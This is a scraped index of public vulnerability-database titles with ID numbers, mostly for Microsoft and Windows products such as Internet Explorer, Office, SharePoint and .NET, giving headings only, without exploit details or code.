Multiple Product Mozilla Maintenance Service for Windows Local Privilege Escalation [93396] Microsoft Malware Protection Engine Crafted File Scan Handling Memory Corruption [93316] Microsoft Visio File Handling External Entity (XXE) Data Parsing Arbitrary File Access [93315] Microsoft Office Word DOC File Shape Data Handling Arbitrary Code Execution [93314] Microsoft Office Publisher PUB File Handling Buffer Underflow [93313] Microsoft Office Publisher PUB File Pointer Handling Arbitrary Code Execution [93312] Microsoft Office Publisher PUB File Signed Integer Handling Arbitrary Code Execution [93311] Microsoft Office Publisher PUB File Incorrect NULL Value Handling Arbitrary Code Execution [93310] Microsoft Office Publisher PUB File Invalid Range Check Handling Arbitrary Code Execution [93309] Microsoft Office Publisher PUB File Return Value Validation Arbitrary Code Execution [93308] Microsoft Office Publisher PUB File Handling Buffer Overflow [93307] Microsoft Office Publisher PUB File Return Value Handling Arbitrary Code Execution [93306] Microsoft Office Publisher PUB File Corrupt Interface Pointer Handling Arbitrary Code Execution [93305] Microsoft Office Publisher PUB File Handling Integer Overflow [93304] Microsoft Office Publisher PUB File Negative Value Allocation Handling Arbitrary Code Execution [93303] Microsoft Lync Unspecified Use-after-free Arbitrary Code Execution [93302] Microsoft .NET Framework WCF Endpoint Authentication Unspecified Policy Requirement Weakness Authentication Bypass [93301] Microsoft .NET Framework XML File Signature Validation Spoofing Weakness [93298] Microsoft IE CMarkup Object Handling Use-after-free Arbitrary Code Execution [93297] Microsoft IE Unspecified Use-after-free Arbitrary Code Execution (2013-1312) [93296] Microsoft IE textNode Style Computation Use-after-free Arbitrary Code Execution [93295] Microsoft IE Unspecified Use-after-free Arbitrary Code Execution (2013-1310) [93294] Microsoft IE CDispNode Use-after-free Arbitrary Code Execution [93293] Microsoft IE TransNavContext Object Handling Use-after-free Arbitrary Code Execution [93292] Microsoft IE Unspecified Use-after-free Arbitrary Code Execution (2013-1307) [93291] Microsoft IE Anchor Element Handling Use-after-free Arbitrary Code Execution [93290] Microsoft IE Unspecified Use-after-free Arbitrary Code Execution (2013-0811) [93289] Microsoft IE Unspecified JSON Data File Information Disclosure [93081] Microsoft Security Essentials UninstallString Unquoted Search Path Local Privilege Escalation Weakness [93075] Forbes Magazine Microsoft Office 365 T-Mobile Router Admin Interface Default Password [93005] Microsoft IE MSXML XMLDOM Object Local File Enumeration [92993] Microsoft IE CGenericElement Object Handling Use-after-free Arbitrary Code Execution [92985] DotNetNuke Modal Windows XSS [92931] Microsoft System Center Operations Manager Web Console /InternalPages/ViewTypeManager.aspx Multiple Parameter XSS [92913] Microsoft IE Unspecified Use-after-free Arbitrary Code Execution (2013-1338) [92771] HP OpenView Operations / VantagePoint for Windows Remote Managed Node Unauthorized Command Execution [92487] Sleipnir on Windows SSL Indicators Unspecified Spoofing Weakness [92284] Microsoft IE localStorage Method History Manipulation Disk Consumption DoS [92257] Microsoft IE CSS Import Handling Remote DoS [92129] Microsoft Office HTML Sanitization Component Unspecified XSS [92128] Microsoft Antimalware Client Improper Pathname Handling Local Privilege Escalation Weakness [92123] Microsoft SharePoint Server SharePoint Lists Access Control Handling Unspecified Information Disclosure [92121] Microsoft IE Unspecified Use-after-free Arbitrary Code Execution (2013-1304) [92120] Microsoft IE Unspecified Use-after-free Arbitrary Code Execution (2013-1303) [92015] Windows SNMP Default Community Write Permission Remote Device Manipulation [91822] Juniper IVE OS Secure Access (SA) Windows Secure Application Manager Uninstall Link XSS [91199] FFmpeg libavcodec msrledec.c msrle_decode_8_16_24_32 Function Microsoft RLE Data Processing DoS [91198] Microsoft IE Broker Process Variant Object Handling Sandbox Bypass Arbitrary Code Execution [91197] Microsoft IE vml.dll Vector Graphic Property Handling Integer Overflow [91196] Microsoft IE Broker Pop-up Window Handling Protected Mode Bypass (pwn2own) [91179] Schneider Electric CD Kerwin on Windows Unauthenticated Synoptic Access [91177] Schneider Electric CD Kerwin on Windows Synoptics Information Disclosure [91154] Microsoft Office for Mac HTML5 Email Message Unspecified Content Tag Loading Information Disclosure [91153] Microsoft OneNote Buffer Size Validation ONE File Handling Information Disclosure [91152] Microsoft SharePoint Unspecified Remote Buffer Overflow DoS [91151] Microsoft SharePoint Unspecified Traversal Privilege Escalation [91150] Microsoft SharePoint Unspecified XSS [91149] Microsoft SharePoint Callback Function Unspecified URL Handling Privilege Escalation [91148] Microsoft Visio Viewer Unspecified Tree Object Type Confusion Visio File Handling Arbitrary Code Execution [91147] Microsoft Silverlight Application Handling Unspecified Double Dereference Arbitrary Code Execution [91146] Microsoft IE CTreeNode Unspecified Use-after-free Arbitrary Code Execution [91145] Microsoft IE removeChild CHtmlComponentProperty Object Handling Use-after-free Arbitrary Code Execution [91144] Microsoft IE onBeforeCopy execCommand selectAll Event Handling Use-after-free Arbitrary Code Execution [91143] Microsoft IE GetMarkupPtr execCommand Print Event Handling Use-after-free Arbitrary Code Execution [91142] Microsoft IE CElement Unspecified Use-after-free Arbitrary Code Execution [91141] Microsoft IE CCaret Unspecified Use-after-free Arbitrary Code Execution [91140] Microsoft IE CMarkupBehaviorContext Object Handling Use-after-free Arbitrary Code Execution [91139] Microsoft IE saveHistory Onload Event Handler Event Handling Use-after-free Arbitrary Code Execution [91138] Microsoft IE OnResize / OnMove CElement::EnsureRecalcNotify() Function Use-after-free Arbitrary Code Execution [91066] IBM WebSphere Application Server (WAS) on Windows was.policy File Permission Handling Weakness [90933] Microsoft IE Arbitrary HTM File Execution [90932] Citrix Metaframe for Windows Malformed Java Applet Handling Remote DoS [90743] RSA Authentication Agent for Windows Quick PIN Unlock Passcode Bypass [90127] Microsoft IE Vector Markup Language (VML) Buffer Allocation Memory Corruption [90126] Microsoft IE CHTML CSelectionManager Object Handling Use-after-free Arbitrary Code Execution [90125] Microsoft IE CObjectElement Object Handling Use-after-free Arbitrary Code Execution [90124] Microsoft IE CPasteCommand Use-after-free Arbitrary Code Execution [90123] Microsoft IE InsertElement Use-after-free Arbitrary Code Execution [90122] Microsoft IE SLayoutRun Use-after-free Arbitrary Code Execution [90121] Microsoft IE pasteHTML TextRange Object Handling Use-after-free Arbitrary Code Execution [90120] Microsoft IE CDispNode SVG Object Handling Use-after-free Arbitrary Code Execution [90119] Microsoft IE LsGetTrailInfo Use-after-free Arbitrary Code Execution [90118] Microsoft IE vtable Use-after-free Arbitrary Code Execution [90117] Microsoft IE CMarkup / CData Object Handling Use-after-free Arbitrary Code Execution [90116] Microsoft IE COmWindowProxy Use-after-free Arbitrary Code Execution [90115] Microsoft IE SetCapture Method Handling Use-after-free Arbitrary Code Execution [90114] Microsoft IE Shift JIS Character Encoding Information Disclosure [89619] Microsoft IE Proxy Server TCP Session Re-use Cross-user Information Disclosure Weakness [89618] Microsoft IE HTTP / Secure Request Handling Spoofing Weakness [89593] Embedthis Appweb on Windows src/mpr/mprLib.c mprUrlEncode Function Heap-based Overflow [89553] Microsoft IE SRC Attribute UNC Share Pathname Handling Arbitrary File Information Disclosure [89478] Cisco VPN Client for Windows VPN Driver Malformed Application Handling Local DoS [89303] Scribus on Windows Python Scripter Unspecified Issue [89164] Microsoft Lync User-Agent Header Handling Remote Arbitrary Command Execution [89086] Google Chrome for Windows IPC NUL Termination Weakness [89080] Google Chrome for Windows Shared Memory Allocation Handling Integer Overflow [89037] Sybase Adaptive Server Enterprise for Windows Unspecified DoS [89035] Sybase Adaptive Server Enterprise for Windows Unspecified Installation Log File Information Disclosure [88968] Microsoft .NET Framework Replace() Function Open Data Protocol (OData) HTTP Request Parsing Remote DoS [88965] Microsoft .NET Framework Double Construction Privilege Escalation [88964] Microsoft .NET Framework System.DirectoryServices.Protocols.SortRequestControl.GetValue() Method this.keys.Length Parameter Heap Buffer Overflow [88962] Microsoft .NET Framework System Drawing Memory Pointer Handling CAS Bypass Information Disclosure [88961] Microsoft System Center Operations Manager Web Console /InternalPages/ExecuteTask.aspx __CALLBACKPARAM Parameter XSS [88960] Microsoft System Center Operations Manager Web Console Unspecified XSS (2013-0009) [88959] Microsoft XML Core Services Integer Truncation XML Handling Memory Corruption [88958] Microsoft XML Core Services Unspecified XSLT Handling Memory Corruption [88914] Eye-Fi Helper for Windows Image .tar Handling Traversal Arbitrary File Write Remote Privilege Escalation [88837] Microsoft Office Excel Memory Corruption DoS [88811] Microsoft Visio VSD File Parsing Memory Corruption [88774] Microsoft IE CDwnBindInfo Object Handling Use-after-free Arbitrary Code Execution [88650] Novell NetIQ eDirectory on Windows dhost Malformed HTTP Request Handling Remote DoS [88642] Trend Micro InterScan VirusWall for Windows interscan.dll Unauthenticated Configuration Manipulation [88638] Jetty on Windows Mixed Case WEB-INF Request Security Bypass [88548] gnome-screensaver gs-manager.c show_windows() Function System Resume Screen Content Disclosure [88539] Microsoft IE mshtml.dll Unclosed Tags Sequence Handling Overflow Arbitrary Code Execution [88357] Microsoft IE fireEvent() Method Mouse / Keyboard Activity Disclosure [88319] Microsoft IE InjectHTMLStream Object Handling Use-after-free Arbitrary Code Execution [88318] Microsoft IE CMarkup Object Handling Use-after-free Arbitrary Code Execution [88317] Microsoft IE Object Ref Counting Use-after-free Arbitrary Code Execution [88315] Microsoft Office Word RTF listoverridecount Element Handling Remote Code Execution [88314] Microsoft Exchange Server RSS Feed Handling Unspecified Remote DoS [88311] Microsoft IP-HTTPS Component Revoked Certificate Restriction Bypass [88170] Microsoft IE Malformed Location Header 30x Redirect Handling DoS [87881] WibuKey Runtime for Windows WkWin32.dll Module DisplayMessageDialog() Method String Parsing Overflow [87819] Microsoft Office OneNote File Handling Memory Corruption [87666] Diebold AccuVote-TSX / GEMS SSL Certificate Windows Registry Plaintext Local Password Disclosure [87555] Adobe ColdFusion for Microsoft IIS Unspecified DoS [87506] Tor Relay Descriptor Windows Capabilities Remote Disclosure [87494] Oracle MySQL on Windows Field_new_decimal::store_value dbug_buff Variable Overflow DoS [87273] Microsoft Office Excel XLS File Handling Overflow [87272] Microsoft Office Excel XLS File Invalid Length SST Handling Use-after-free Arbitrary Code Execution [87271] Microsoft Office Excel XLS File Handling Memory Corruption [87270] Microsoft Office Excel SerAuxErrBar XLS File Handling Overflow [87267] Microsoft .NET Framework WPF Reflection Optimization Object Permission Handling Arbitrary Code Execution [87266] Microsoft .NET Framework Web Proxy Setting Auto-Discovery (WPAD) Handling Remote Code Execution [87265] Microsoft .NET Framework Path Subversion Arbitrary DLL Injection Code Execution [87264] Microsoft .NET Framework Partially Trusted Code Function Handling Information Disclosure [87263] Microsoft .NET Framework Reflection Object Permission Handling Arbitrary Code Execution [87262] Microsoft IIS FTP Command Injection Information Disclosure [87261] Microsoft IIS Log File Permission Weakness Local Password Disclosure [87258] Microsoft IE CTreePos Deleted Object Handling Use-after-free Arbitrary Code Execution [87257] Microsoft IE CFormElement Deleted Object Handling Use-after-free Arbitrary Code Execution [87256] Microsoft IE CTreeNode Deleted Object Handling Use-after-free Arbitrary Code Execution [87255] Microsoft Office Excel XLS File Handling Memory Corruption [87058] Sophos Anti-Virus for Windows Buffer Overflow Protection System (BOPS) sophos_detoured_x64.dll ASLR Bypass [86929] Microsoft MN-700 Hardcoded SSL Private Key SSL Traffic Decryption Weakness [86924] X Windows (X11R6) Malformed Font Size Handling DoS [86913] Microsoft IE Recursive JavaScript Event Handling DoS [86906] Microsoft Multiple Products VBScript ActiveX Word Object Handling DoS [86899] Microsoft IIS 302 Redirect Message Internal IP Address Remote Disclosure [86898] Microsoft IE Crafted IMG Tag Saturation Remote DoS [86897] Oracle on Windows TNSLSNR80.EXE Malformed Input Parsing Remote DoS [86896] Microsoft IE MSScriptControl.ScriptControl GetObject Arbitrary File Access [86790] Microsoft Virtual PC 2007 Crafted x86 Instruction Sequence Handling Local DoS [86776] Microsoft IE 9 File NULL Byte Handling XSS Filter Bypass [86767] Microsoft Office Publisher Read Access Violation PUB File Handling Memory Corruption [86733] Microsoft Office Picture Manager GIF Image File Handling Memory Corruption [86732] Microsoft Office DOC File Handling Stack Overflow [86623] Microsoft Office Excel / Excel Viewer (Xlview.exe) XLS File Handling Arbitrary Code Execution [86622] Microsoft SQL Server Local Authentication Bypass [86515] Mozilla Firefox nsFilePicker Windows Recent Documents Privacy Mode Bypass [86512] Mozilla Firefox on Windows 7 Jump Bar Limited Browsing History Disclosure [86179] ActiveTcl on Windows Path Subversion Arbitrary DLL Injection Code Execution [86178] Python on Windows Path Subversion Arbitrary DLL Injection Code Execution [86177] ActivePerl on Windows Path Subversion Arbitrary DLL Injection Code Execution [86176] ActivePython on Windows Path Subversion Arbitrary DLL Injection Code Execution [86175] Oracle MySQL on Windows Path Subversion Arbitrary DLL Injection Code Execution [86174] Zend Server on Windows Path Subversion Arbitrary DLL Injection Code Execution [86173] RubyInstaller on Windows Path Subversion Arbitrary DLL Injection Code Execution [86172] PHP on Windows Path Subversion Arbitrary DLL Injection Code Execution [86158] EMC NetWorker Module for Microsoft Applications (NMM) Communication Channel Crafted Message Parsing Remote Code Execution [86157] EMC NetWorker Module for Microsoft Applications (NMM) MS Exchange Server Upgrade / Installation Cleartext Admin Credential Local Information Disclosure [86059] Microsoft Multiple Product HTML String Sanitization XSS Weakness [86057] Microsoft SQL Server Report Manager Unspecified XSS [86056] Microsoft Works Unspecified DOC File Handling Memory Corruption [86055] Microsoft Multiple Product RTF File listid Handling Use-after-free Remote Code Execution [86054] Microsoft Office Word File PAPX Section Handling Memory Corruption [85835] Oracle on Windows bb.sqljsp Traversal Arbitrary File Access [85834] Oracle on Windows a.jsp Traversal Arbitrary File Access [85833] Microsoft Outlook Concealed Attachment Weakness [85832] Microsoft Virtual Machine Custom Java Codebase Arbitrary Command Execution [85830] Microsoft IE index.dat OBJECT DATA Tag File Injection Arbitrary Command Execution [85826] Microsoft IE mstask.exe Malformed Packet Handling CPU Consumption Remote DoS [85727] RSA Authentication Agent / Client Windows Credentials Usage Local Authentication Bypass [85574] Microsoft IE cloneNode Element Use-after-free Memory Corruption [85573] Microsoft IE CTreeNode Object ISpanQualifier Instance Type Confusion Use-after-free Memory Corruption [85572] Microsoft IE Event Listener Unspecified Use-after-free Memory Corruption [85571] Microsoft IE OnMove Unspecified Use-after-free Memory Corruption [85532] Microsoft IE CMshtmlEd::Exec() Function Use-after-free Remote Code Execution [85316] Microsoft System Center Configuration Manager ReportChart.asp URI XSS [85315] Microsoft Visual Studio Team Foundation Server Unspecified XSS [84912] Microsoft MS-CHAP V2 Virtual Private Network (VPN) MitM Password Disclosure [84896] Skype on Windows Malformed File Transfer Remote Memory Corruption DoS [84606] Microsoft Visio DXF File Handling Overflow [84605] Microsoft Office Computer Graphics Metafile (CGM) File Handling Memory Corruption [84597] Microsoft IE JavaScript Parsing Memory Object Size Calculation Memory Corruption [84596] Microsoft IE NULL Object Handling Use-after-free Arbitrary Code Execution [84595] Microsoft IE Layout Handling Deleted Object Handling Memory Corruption [84594] Microsoft IE Deleted Virtual Function Table Handling Arbitrary Code Execution [84553] Microsoft Help &amp [84433] Citrix Access Gateway Plugin for Windows ActiveX (nsepa.exe) StartEPA() Method Multiple HTTP Response Header Parsing Remote Overflow [84339] nginx/Windows Multiple Request Sequence Parsing Arbitrary File Access [84224] Sybase Adaptive Server Enterprise for Windows Java Unspecified Arbitrary File Access [83860] Microsoft IE XML Data Handling Arbitrary File Access [83797] Microsoft IE on NT Hashed Password Remote Disclosure MiTM Weakness [83771] Microsoft IIS Tilde Character Request Parsing File / Folder Name Information Disclosure [83720] Microsoft .NET Framework Crafted Tilde (~) Request Resource Consumption Remote DoS [83672] Microsoft IE NTLM Authentication Remote Information Disclosure [83655] Microsoft Visual Basic for Applications Unspecified Path Subversion Arbitrary DLL Injection Code Execution [83654] Microsoft Office for Mac Insecure Permissions Arbitrary File Creation Local Privilege Escalation [83653] Microsoft IE Deleted Cached Object Handling Memory Corruption [83652] Microsoft IE Attribute Removal Handling Memory Corruption [83651] Microsoft SharePoint Reflected List Parameter Unspecified XSS [83650] Microsoft SharePoint scriptresx.ashx Unspecified XSS [83649] Microsoft SharePoint Arbitrary User Search Scope Manipulation [83648] Microsoft SharePoint Unspecified Arbitrary Site Redirect [83647] Microsoft SharePoint Username Unspecified XSS [83567] Microsoft NT Advanced Server (NTAS) FTP Client Pipe Character Arbitrary Command Execution [83545] Microsoft Outlook Web App owa/redir.aspx URL Parameter Arbitrary Site Redirect [83454] Microsoft IIS ODBC Tool ctguestb.idc Unauthenticated Remote DSN Initialization [83439] Microsoft IE Long Unicode String Handling DoS [83388] Microsoft JET Database Engine (MS Access) ODBC API Crafted VBA String Remote Command Execution [83386] Microsoft IIS Non-existent IDC File Request Web Root Path Disclosure [83251] Google Chrome for Windows metro_driver.dll Path Subversion Arbitrary DLL Injection Code Execution Weakness [82873] Microsoft XML Core Services Uninitalized Memory Object Handling Remote Code Execution [82872] Microsoft IE Scrolling Events Cross-domain Remote Information Disclosure [82871] Microsoft IE OnRowsInserted Deleted Object Handling Memory Corruption [82870] Microsoft IE insertRow Deleted Object Handling Memory Corruption [82869] Microsoft IE insertAdjacentText Memory Location Accessing Memory Corruption [82868] Microsoft IE OnBeforeDeactivate Event Deleted Object Handling Memory Corruption [82867] Microsoft IE Title Element Change Deleted Object Handling Memory Corruption [82866] Microsoft IE Col Element Deleted Object Handling Memory Corruption [82865] Microsoft IE Same ID Property Deleted Object Handling Memory Corruption [82864] Microsoft IE Developer Toolbar Deleted Object Handling Memory Corruption [82863] Microsoft IE Null Byte Process Memory Remote Information Disclosure [82862] Microsoft IE EUC-JP Character Encoding XSS [82861] Microsoft IE HTML Sanitization String Handling Remote Information Disclosure [82860] Microsoft IE Center Element Deleted Object Handling Memory Corruption [82859] Microsoft .NET Framework Memory Access Function Pointer Handling Memory Corruption [82853] Microsoft Dynamics AX Enterprise Portal Unspecified XSS [82852] Microsoft Lync Unspecified Path Subversion Arbitrary DLL Injection Code Execution [82848] Microsoft IIS $INDEX_ALLOCATION Data Stream Request Authentication Bypass [82673] Mozilla Multiple Product Windows Shares HTML Page Loading Arbitrary File Access [82565] Microsoft IE / Outlook OBJECT Handling Arbitrary File Access [82564] Microsoft Word WebView Crafted Metadata Handling Arbitrary Script Execution [82563] Microsoft Visual Studio WebViewFolderIcon ActiveX (MSCOMM32.OCX) Overflow [82562] Microsoft IE Cross-Origin Window Forced Navigation Weakness [82473] Microsoft WordPad DOC File Handling NULL Pointer Dereference DoS [82436] MapServer for Windows Bundled Apache / PHP Configuration Local File Inclusion [82405] Microsoft ASP.NET Session ID Generation Entropy Weakness [81960] Google Chrome for Windows NPAPI Plugins Search Path Subversion Local Privilege Escalation [81903] Microsoft Office X for Macintosh Registration Service Remote Overflow DoS [81734] Microsoft .NET Framework Untrusted User Input Serialization Remote Code Execution [81733] Microsoft .NET Framework Partially Trusted Assembly Object Serialization Remote Code Execution [81732] Microsoft Office RTF Data Handling Memory Corruption [81731] Microsoft Visio Viewer Attribute Validation Visio File Handling Memory Corruption [81728] Microsoft Office Excel Excel File Handling Memory Corruption [81727] Microsoft Office Excel OBJECTLINK Record Excel File Handling Memory Corruption [81726] Microsoft Office Excel Modified Bytes Excel File Handling Memory Corruption [81725] Microsoft Office Excel SLXI Record Excel File Handling Memory Corruption [81724] Microsoft Office Excel Type Mismatch Series Record Excel File Handling Memory Corruption [81723] Microsoft Office Excel MergeCells Record Excel File Handling Overflow [81722] Microsoft .NET Framework Buffer Allocation XBAP / .NET Application Handling Remote Code Execution [81721] Microsoft .NET Framework WPF Application Index Value Comparison Request Parsing Remote DoS [81719] Microsoft Office GDI+ Library Embedded EMF Image Office Document Handling Overflow [81718] Microsoft Silverlight Hebrew Unicode Engine XAML Glyph Rendering Double-free Remote Code Execution [81624] IBM AppScan / Policy Tester Integrated Windows Authentication Service Account Hijacking [81331] Microsoft Visual Studio Incremental Linker (link.exe) ConvertRgImgSymToRgImgSymEx Function COFF Symbol Table Executable Handling Remote Overflow [81134] Microsoft Multiple Product Works Converter WPS File Handling Remote Overflow [81133] Microsoft .NET Framework CRL (Common Language Runtime) Function Parameter Parsing Remote Code Execution [81132] Microsoft Forefront Unified Access Gateway Default Website Configuration External Network Information Disclosure [81131] Microsoft Forefront Unified Access Gateway UAG Server Arbitrary Site Redirect [81130] Microsoft IE vgx.dll VML Style Deleted Object Handling Remote Memory Corruption [81129] Microsoft IE SelectAll Deleted Object Handling Remote Memory Corruption [81128] Microsoft IE onReadyStateChange Event Deleted Object Handling Remote Memory Corruption [81127] Microsoft IE JScript9 Deleted Object Handling Remote Memory Corruption [81126] Microsoft IE Print Feature HTML Page Printing Remote Code Execution [81125] Microsoft Multiple Product MSCOMCTL.OCX Multiple Control Memory Corruption [81112] Microsoft SQL Server RESTORE DATABASE Command SQL Injection [80487] Microsoft Security Essentials Antimalware Engine Malformed CAB File Handling Scan Bypass [80443] Microsoft Security Essentials Antimalware Engine Malformed RAR File Handling Scan Bypass [80402] Microsoft Security Essentials Antimalware Engine Malformed TAR File Handling Scan Bypass [80376] Sophos Anti-Virus Malformed Microsoft Office File Handling Scan Bypass [80375] Comodo Antivirus Malformed Microsoft Office File Handling Scan Bypass [80352] Bitcoin-Qt for Windows Malformed Bitcoin Protocol Message Handling Remote Code Execution [80174] Microsoft IE Protected Mode Bypass Low Integrity Process Handling Memory Corruption DoS [80173] Microsoft IE Unspecified Overflow [80088] Apple Safari Internationalized for Windows Domain Name (IDN) Feature Homoglyph Parsing Domain Name Spoofing Weakness [80006] Microsoft Visual Studio Add-In Loading Local Privilege Escalation [80001] Microsoft Expression Design Path Subversion Arbitrary DLL Injection Code Execution [79629] Diebold AccuVote-TS Memory Card explorer.glb BallotStation Boot Sequence Bypass Windows Access [79551] Sun Java on Windows fontmanager.dll UIManager.getSystemLookAndFeelClassName Function Overflow [79268] Microsoft IE Deleted Object VML Handling Remote Memory Corruption [79267] Microsoft IE String Creation NULL Byte Handling Process Memory Information Disclosure [79266] Microsoft IE Deleted Object HTML Layout Handling Remote Memory Corruption [79265] Microsoft IE Copy and Paste Cross-domain Information Disclosure [79264] Microsoft SharePoint wizardlist.aspx skey Parameter XSS [79263] Microsoft SharePoint themeweb.aspx Unspecified XSS [79262] Microsoft SharePoint inplview.aspx Unspecified XSS [79261] Microsoft .NET Framework / Silverlight Buffer Length Calculation XAML Browser Application Handling Remote Memory Corruption [79260] Microsoft .NET Framework / Silverlight Unmanaged Object XAML Browser Application Handling Remote Code Execution [79258] Microsoft Visio Viewer Unspecified Visio File Handling Remote Memory Corruption (2012-0038) [79257] Microsoft Visio Viewer Unspecified Visio File Handling Remote Memory Corruption (2012-0037) [79256] Microsoft Visio Viewer Unspecified Visio File Handling Remote Memory Corruption (2012-0036) [79255] Microsoft Visio Viewer Unspecified Visio File Handling Remote Memory Corruption (2012-0020) [79254] Microsoft Visio Viewer Unspecified Visio File Handling Remote Memory Corruption (2012-0019) [79192] Microsoft IE Javascript Dialog Origin Spoofing [79186] Microsoft IE onunload Location Field Overwrite [79173] Microsoft IE Image Control Title Attribute Status Bar Spoofing [79164] Microsoft IE about:blank Location Bar Overlay Phishing Weakness [79120] Microsoft Live Writer Path Subversion Arbitrary DLL Injection Code Execution [79118] Microsoft RDP Client Path Subversion Arbitrary DLL Injection Code Execution [79116] Microsoft Snapshot Viewer Path Subversion Arbitrary DLL Injection Code Execution [79115] Microsoft MS Clip Book Viewer Path Subversion Arbitrary DLL Injection Code Execution [79114] Microsoft Clip Organizer Path Subversion Arbitrary DLL Injection Code Execution [79113] Microsoft Movie Maker Path Subversion Arbitrary DLL Injection Code Execution [79112] Microsoft Virtual PC Path Subversion Arbitrary DLL Injection Code Execution [79088] Windows Live Messenger (Hotmail) for iPhone Username Local Disclosure [79041] Webmin Samba Windows File Sharing Module /tmp/.webmin Local Password Disclosure [78738] Mozilla Multiple Products mImageBufferSize() Method image/vnd.microsoft.icon Image Encoding Information Disclosure [78442] Oracle VM VirtualBox Windows Guest Additions Component Unspecified Local Issue [78208] Microsoft AntiXSS Library Sanitization Module Escaped CSS Content Parsing XSS Weakness [78057] Microsoft .NET Framework ASP.NET Hash Collision Web Form Post Parsing Remote DoS [78056] Microsoft .NET Framework Forms Authentication Sliding Expiry Cached Content Parsing Remote Code Execution [78055] Microsoft .NET Framework ASP.NET Username Parsing Authentication Bypass [78054] Microsoft .NET Framework Forms Authentication Return URL Handling Arbitrary Site Redirect [77675] Microsoft IE Content-Disposition Header Parsing Cross-Domain Remote Information Disclosure [77674] Microsoft IE Path Subversion Arbitrary DLL Injection Code Execution [77673] Microsoft IE XSS Filter Event Parsing Cross-Domain Remote Information Disclosure [77672] Microsoft Office Publisher Unspecified Publisher File Handling Remote Memory Corruption [77671] Microsoft Office Publisher Invalid Pointer Publisher File Handling Remote Memory Corruption [77670] Microsoft Office Publisher Array Indexing Publisher File Handling Remote Memory Corruption [77669] Microsoft Office Pinyin IME for Simplified Chinese Insecure Configuration Option Local Privilege Escalation [77668] Microsoft Office PowerPoint Path Subversion Arbitrary DLL Injection Code Execution [77665] Microsoft Time ActiveX (DATIME.DLL) Unspecified IE Web Page Handling Remote Code Execution [77664] Microsoft Office PowerPoint OfficeArt Shape Record PowerPoint File Handling Remote Memory Corruption [77661] Microsoft Office Excel Record Parsing Object Handling Remote Memory Corruption [77659] Microsoft Office Use-after-free Border Property Word Document Handling Remote Code Execution [77606] Microsoft IE JavaScript Implementation getComputedStyle Method Page Handling Remote Information Disclosure [77537] Microsoft IE Cache Objects IFRAME Handling Browsing History Disclosure [77228] Microsoft Outlook Client Large Header Handling Message Body Content Injection [76953] Mozilla Multiple Products Windows D2D Hardware Acceleration Same Origin Policy Bypass Remote Information Disclosure [76460] Microsoft Office Publisher pubconv.dll PUB File Handling Overflow [76406] MPlayer on Windows wrapped Allocation Function calloc() Multiple File Handling Remote Overflow [76237] Microsoft Forefront Unified Access Gateway IIS NULL Session Cookie Parsing Remote DoS [76236] Microsoft Forefront Unified Access Gateway MicrosoftClient.jar JAR File Code Execution [76235] Microsoft Forefront Unified Access Gateway ExcelTables Response Splitting Unspecified XSS [76234] Microsoft Forefront Unified Access Gateway Unspecified XSS [76233] Microsoft Forefront Unified Access Gateway ExcelTables Unspecified XSS [76224] Microsoft Host Integration Server Multiple Process Request Parsing Remote Memory Corruption DoS [76223] Microsoft Host Integration Server Multiple Process Request Parsing Infinite Loop Remote DoS [76214] Microsoft .NET Framework / Silverlight Class Inheritance Restriction Web Page Handling Remote Code Execution [76213] Microsoft IE Virtual Function Table Corruption mshtml.dll Extra Size Index Handling Remote Code Execution [76212] Microsoft IE Use-after-free swapNode() Method Body Element Handling Remote Code Execution [76211] Microsoft IE Select Element Handling Uninitialized Object Access Remote Memory Corruption [76210] Microsoft IE Jscript9.dll Uninitialized Object Access Remote Memory Corruption [76209] Microsoft IE Use-after-free OnLoad Event Handling Remote Code Execution [76208] Microsoft IE Use-after-free Type-Safety Weakness Option Element Handling Remote Code Execution [76207] Microsoft IE OLEAuto32.dll Uninitialized Object Access Remote Memory Corruption [76206] Microsoft IE Use-after-free Scroll Event Handling Remote Code Execution [76049] ServersCheck Monitoring windowsaccountsedit.html Multiple Parameter XSS [75537] Google Chrome Windows Media Player Plugin Infobar Bypass [75511] Microsoft HTML Help itss.dll CHM File Handling Overflow [75471] Windows Media Player AVI File Handling Overflow DoS [75394] Microsoft SharePoint Source Parameter Arbitrary Site Redirect [75393] Microsoft SharePoint Unspecified URI XSS [75391] Microsoft SharePoint Contact Details XSS [75390] Microsoft SharePoint EditForm.aspx XSS [75389] Microsoft SharePoint SharePoint Calendar URI XSS [75387] Microsoft Office Excel Unspecified Signedness Error Excel File Handling Memory Corruption [75386] Microsoft Office Excel Unspecified Conditional Expression Parsing Excel File Handling Memory Corruption [75385] Microsoft Office Excel Unspecified Excel File Record Handling Memory Corruption [75384] Microsoft Office Excel Unspecified Array-Indexing Weakness Excel File Handling Memory Corruption [75383] Microsoft Office Excel Unspecified Use-after-free Memory Dereference Excel File Handling Remote Code Execution [75381] Microsoft SharePoint XML / XSL File Handling Unspecified Arbitrary File Disclosure [75380] Microsoft Office MSO.dll Object Pointer Dereference Word Document Handling Remote Code Execution [75379] Microsoft Office MSO.dll Path Subversion Arbitrary DLL Injection Code Execution [75345] Apple QuickTime on Windows Movie File mp4v Tag Image Description Memory Corruption [75289] GTK+ modules/engines/ms-windows/xp_theme.c uxtheme.dll Path Subversion Arbitrary DLL Injection Code Execution [75271] Microsoft SilverLight DataGrid Memory Leak Multiple Element Remote DoS [75269] Microsoft Silverlight DependencyProperty Property Handling Remote DoS [75250] Microsoft IE Unspecified Remote Code Execution [75174] W-Agora on Windows search.php3 bn Parameter Traversal Local File Inclusion [75172] W-Agora on Windows login.php3 bn Parameter Traversal Local File Inclusion [75171] W-Agora on Windows for-print.php3 bn Parameter Traversal Local File Inclusion [75030] Microsoft msxml.dll xsltGenerateIdFunction Heap Memory Address Disclosure Weakness [74976] Joomla! Administrative Modal Windows XSS [74827] Pidgin on Windows gtkutils.c file: URL Arbitrary Program Execution [74689] PHP on Windows SPL Extension SplFileInfo::getType Function Symlink Arbitrary File Overwrite [74525] Bugzilla on Windows Uploaded Attachment Temporary File Local Information Disclosure [74500] Microsoft IE STYLE Object Parsing Memory Corruption [74499] Microsoft IE SetViewSlave() Function XSLT Object Markup Reloading Memory Corruption [74498] Microsoft IE Shift JIS Character Sequence Parsing Cross-domain Remote Information Disclosure [74497] Microsoft IE Event Handler Cross-domain Remote Information Disclosure [74496] Microsoft IE Protected Mode Bypass Arbitrary File Creation [74495] Microsoft IE window.open() Function Race Condition Memory Corruption [74494] Microsoft IE Crafted Link Telnet URI Handler Remote Program Execution [74450] Microsoft IE HTTPS Session HTTP Set-Cookie Header HSTS includeSubDomains Weakness MiTM Arbitrary Cookie Overwrite [74404] Microsoft .NET Framework System.Net.Sockets Code Access Security Bypass Information Disclosure [74403] 